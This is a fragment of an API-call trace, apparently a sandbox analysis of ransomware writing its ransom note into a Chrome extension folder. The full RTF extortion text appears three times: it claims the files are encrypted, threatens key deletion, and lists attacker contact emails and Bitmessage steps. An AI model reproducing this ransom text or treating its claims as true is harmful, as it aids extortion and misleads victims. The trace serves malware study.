[0278.561] CloseHandle (hObject=0x2c8) returned 1 [0278.561] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\#readme_eman#.rtf")) returned 0xffffffff [0278.561] GetLastError () returned 0x2 [0278.561] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.561] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.561] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.561] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 